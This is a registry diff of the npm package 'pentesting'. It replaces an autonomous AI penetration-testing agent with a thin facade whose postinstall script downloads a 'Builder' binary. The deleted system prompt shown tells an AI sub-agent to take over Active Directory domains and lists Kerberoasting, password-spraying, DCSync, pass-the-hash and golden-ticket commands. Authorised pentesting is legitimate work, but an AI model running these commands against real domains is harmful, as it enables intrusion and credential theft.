pentesting 0.73.14 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +120 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
package/package.json CHANGED
@@ -1,42 +1,30 @@
1
1
  {
2
2
  "name": "pentesting",
3
- "version": "0.73.14",
4
- "description": "Autonomous Penetration Testing AI Agent",
3
+ "version": "0.90.1",
4
+ "description": "Public pentesting facade for Builder",
5
5
  "type": "module",
6
- "main": "dist/main.js",
7
- "types": "dist/main.d.ts",
8
6
  "bin": {
9
- "pentesting": "dist/main.js"
7
+ "pentesting": "./bin/pentesting.mjs",
8
+ "builder": "./bin/pentesting.mjs"
10
9
  },
11
10
  "files": [
12
- "dist",
13
- "skills",
11
+ "bin",
12
+ "lib",
13
+ "scripts",
14
14
  "README.md"
15
15
  ],
16
16
  "scripts": {
17
- "dev": "npm run build && node dist/main.js",
18
- "dev:tsx": "tsx src/platform/tui/main.tsx",
19
- "build": "NODE_OPTIONS='--max-old-space-size=4096' tsup",
20
- "start": "npm run docker:start --",
21
- "start:local": "node dist/main.js",
22
- "test": "sh -c 'mkdir -p .vitest; TMPDIR=.vitest npx vitest run \"$@\"; status=$?; rm -rf .vitest .pentesting; exit $status' --",
23
- "test:watch": "vitest",
24
- "lint": "tsc --noEmit",
25
- "verify": "npm run lint && npm run test && npm run build",
26
- "verify:docker": "npm run docker:local && bash test.sh",
27
- "check": "docker system prune -af --volumes && TMPDIR=/tmp npm run test && npm run build && npm run docker:local && bash test.sh",
28
- "check:ci": "npm run verify && npm run verify:docker",
29
- "check:clean": "docker system prune -af --volumes && npm run check:ci",
17
+ "postinstall": "node ./scripts/postinstall.mjs",
18
+ "dev": "node ./bin/pentesting.mjs",
19
+ "preflight:local": "bash scripts/preflight-local.sh",
20
+ "test": "node --test tests/*.test.mjs",
21
+ "verify": "npm run preflight:local && npm run test",
22
+ "check": "npm run verify",
30
23
  "prepublishOnly": "npm run verify",
31
- "docker:build": "docker buildx build -f Dockerfile.base --platform linux/amd64,linux/arm64 -t agnusdei1207/pentesting-base:latest --push .",
32
- "release": "npm run release:patch && npm run release:docker",
33
24
  "publish:token": "npm publish --access public",
34
- "release:patch": "npm version patch && npm run build && npm run publish:token",
35
- "release:minor": "npm version minor && npm run build && npm run publish:token",
36
- "release:major": "npm version major && npm run build && npm run publish:token",
37
- "docker:local": "docker buildx build --load -f Dockerfile -t agnusdei1207/pentesting:latest .",
38
- "docker:start": "npm run docker:local && docker run -it --rm -e PENTEST_API_KEY -e PENTEST_BASE_URL -e PENTEST_MODEL -e SEARCH_API_KEY -e SEARCH_API_URL -e PENTEST_SCOPE_MODE -e PENTEST_APPROVAL_MODE -e PENTEST_TOR agnusdei1207/pentesting:latest",
39
- "release:docker": "bash scripts/docker-build-release.sh"
25
+ "release:patch": "npm version patch && npm run verify && npm run publish:token",
26
+ "release:minor": "npm version minor && npm run verify && npm run publish:token",
27
+ "release:major": "npm version major && npm run verify && npm run publish:token"
40
28
  },
41
29
  "repository": {
42
30
  "type": "git",
@@ -66,23 +54,6 @@
66
54
  "author": "agnusdei1207",
67
55
  "license": "MIT",
68
56
  "engines": {
69
- "node": ">=18.0.0"
70
- },
71
- "dependencies": {
72
- "chalk": "^5.6.2",
73
- "commander": "^14.0.3",
74
- "ink": "^6.8.0",
75
- "playwright": "^1.58.2",
76
- "react": "^19.2.4"
77
- },
78
- "devDependencies": {
79
- "@types/node": "^25.3.0",
80
- "@types/react": "^19.2.14",
81
- "esbuild": "^0.27.3",
82
- "ink-testing-library": "^4.0.0",
83
- "tsup": "^8.5.1",
84
- "tsx": "^4.21.0",
85
- "typescript": "^5.9.3",
86
- "vitest": "^4.0.18"
57
+ "node": ">=18.18.0"
87
58
  }
88
59
  }
@@ -0,0 +1,30 @@
1
+ import { installManagedBuilder } from "../lib/runtime.mjs";
2
+
3
+ if (process.env.BUILDER_BIN) {
4
+ console.log("[pentesting] BUILDER_BIN is set; skipping managed Builder download.");
5
+ process.exit(0);
6
+ }
7
+
8
+ if (process.env.BUILDER_SKIP_DOWNLOAD === "true") {
9
+ console.log("[pentesting] Skipping managed Builder download.");
10
+ process.exit(0);
11
+ }
12
+
13
+ try {
14
+ const result = await installManagedBuilder({
15
+ force: process.env.BUILDER_FORCE_DOWNLOAD === "true",
16
+ });
17
+
18
+ if (result.source === "cached") {
19
+ console.log("[pentesting] Managed Builder binary already present.");
20
+ } else if (result.source === "downloaded") {
21
+ console.log("[pentesting] Managed Builder binary downloaded successfully.");
22
+ }
23
+ } catch (error) {
24
+ console.error(
25
+ `[pentesting] Failed to provision the managed Builder binary: ${
26
+ error instanceof Error ? error.message : String(error)
27
+ }`,
28
+ );
29
+ process.exit(1);
30
+ }
@@ -0,0 +1,24 @@
1
+ #!/bin/sh
2
+
3
+ set -eu
4
+
5
+ require_command() {
6
+ if ! command -v "$1" >/dev/null 2>&1; then
7
+ echo "Missing required command: $1" >&2
8
+ exit 1
9
+ fi
10
+ }
11
+
12
+ require_path() {
13
+ if [ ! -e "$1" ]; then
14
+ echo "Missing required path: $1" >&2
15
+ exit 1
16
+ fi
17
+ }
18
+
19
+ SCRIPT_DIR=$(CDPATH= cd -- "$(dirname "$0")" && pwd)
20
+ PACKAGE_ROOT=$(CDPATH= cd -- "$SCRIPT_DIR/.." && pwd)
21
+
22
+ require_command node
23
+ require_path "$PACKAGE_ROOT/bin/pentesting.mjs"
24
+ require_path "$PACKAGE_ROOT/lib/runtime.mjs"
package/dist/ad/prompt.md DELETED
@@ -1,60 +0,0 @@
1
- # Active Directory — AD Attack Sub-Agent
2
-
3
- You are an Active Directory attack expert. Your goal is domain takeover through Kerberos, LDAP, and SMB.
4
-
5
- ## Operation Sequence
6
- 1. AD Enumeration → 2. Attack Path Analysis → 3. Credential Acquisition → 4. Escalation → 5. Domain Domination
7
-
8
- ## Execution Commands
9
-
10
- ```bash
11
- # LDAP Enumeration
12
- ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName memberOf
13
- ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=computer)" dNSHostName
14
-
15
- # CrackMapExec Enumeration
16
- crackmapexec smb <dc> --users
17
- crackmapexec smb <dc> --groups
18
- crackmapexec smb <dc> --shares
19
- crackmapexec smb <dc> --pass-pol
20
-
21
- # BloodHound Collection
22
- bloodhound-python -c All -d <domain> -u <user> -p <pass> -dc <dc>
23
-
24
- # RPC Enumeration
25
- rpcclient -U "" -N <dc> -c "enumdomusers;enumdomgroups;querydispinfo"
26
-
27
- # Kerberoasting
28
- impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc> -request -outputfile kerberoast.txt
29
- hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
30
-
31
- # AS-REP Roasting
32
- impacket-GetNPUsers <domain>/ -dc-ip <dc> -usersfile users.txt -format hashcat
33
- hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
34
-
35
- # Password Spraying
36
- crackmapexec smb <dc> -u users.txt -p 'Company2024!' --continue-on-success
37
-
38
- # DCSync
39
- impacket-secretsdump <domain>/<admin>:<pass>@<dc>
40
-
41
- # Pass-the-Hash
42
- impacket-psexec -hashes :<ntlm> <domain>/<user>@<target>
43
- crackmapexec smb <targets> -u <user> -H <ntlm>
44
-
45
- # Golden Ticket
46
- impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> administrator
47
-
48
- # Lateral Movement
49
- impacket-wmiexec <domain>/<user>:<pass>@<target>
50
- evil-winrm -i <target> -u <user> -p <pass>
51
- ```
52
-
53
- ## Output
54
- ```
55
- [domain] CORP.LOCAL
56
- [users] 500 users (Domain Admins: 5)
57
- [attack] Kerberoastable: 3, AS-REP: 2, Unconstrained delegation: 1
58
- [path] svc_sql → Kerberoast → MSSQL Admin → DCSync → DA
59
- [action] Proceed with hash cracking after Kerberoasting
60
- ```